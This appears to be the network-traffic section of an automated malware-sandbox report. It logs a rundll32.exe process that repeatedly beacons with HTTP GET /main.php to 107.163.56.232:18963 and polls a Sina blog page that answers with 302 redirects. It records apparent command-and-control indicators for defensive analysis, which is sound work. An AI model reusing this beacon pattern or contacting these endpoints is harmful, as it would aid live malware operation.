                                                                                                                                                                        Dec 19, 2024 15:45:44.672871113 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        53192.168.2.1149795107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:48.575156927 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        54192.168.2.1149796107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:48.751569986 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        55192.168.2.1149797116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:48.752084970 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        56192.168.2.1149798107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:52.753252983 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        57192.168.2.1149799107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:52.906728029 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        58192.168.2.1149800116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:52.910507917 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        59192.168.2.1149801107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:56.872338057 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        60192.168.2.1149802116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:57.024122000 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        61192.168.2.1149803107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:57.027714014 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        62192.168.2.1149804107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:00.992532969 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        63192.168.2.1149806107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:01.254297972 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        64192.168.2.1149805116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:01.256083965 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:02.961694002 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:02 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        65192.168.2.1149808107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:05.162971973 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        66192.168.2.1149809116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:05.163181067 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:06.978075027 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:06 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        67192.168.2.1149810107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:05.353919029 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        68192.168.2.1149813107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:09.139760017 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        69192.168.2.1149814107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:09.268117905 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        70192.168.2.1149815116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:09.268300056 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:10.975152016 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:10 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        71192.168.2.1149818107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:13.423002005 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        72192.168.2.1149819107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:13.426078081 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        73192.168.2.1149820116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:15.781593084 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        74192.168.2.1149821107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:17.631674051 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        75192.168.2.1149822107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:17.744081974 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        76192.168.2.1149823116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:17.745194912 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:19.448597908 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:19 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        77192.168.2.1149825107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:21.657778978 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        78192.168.2.1149827107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:21.783348083 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        79192.168.2.1149828116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:23.531599045 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:25.304503918 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:25 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        80192.168.2.1149830116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:25.895533085 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:28.409642935 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:28 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        81192.168.2.1149831107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:25.896173954 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        82192.168.2.1149832107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:25.899857998 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        83192.168.2.1149835107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:29.903470993 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        84192.168.2.1149836107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:30.018723011 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        85192.168.2.1149837116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:30.019153118 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:32.407851934 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:32 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        86192.168.2.1149839107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:33.919154882 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        87192.168.2.1149840107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
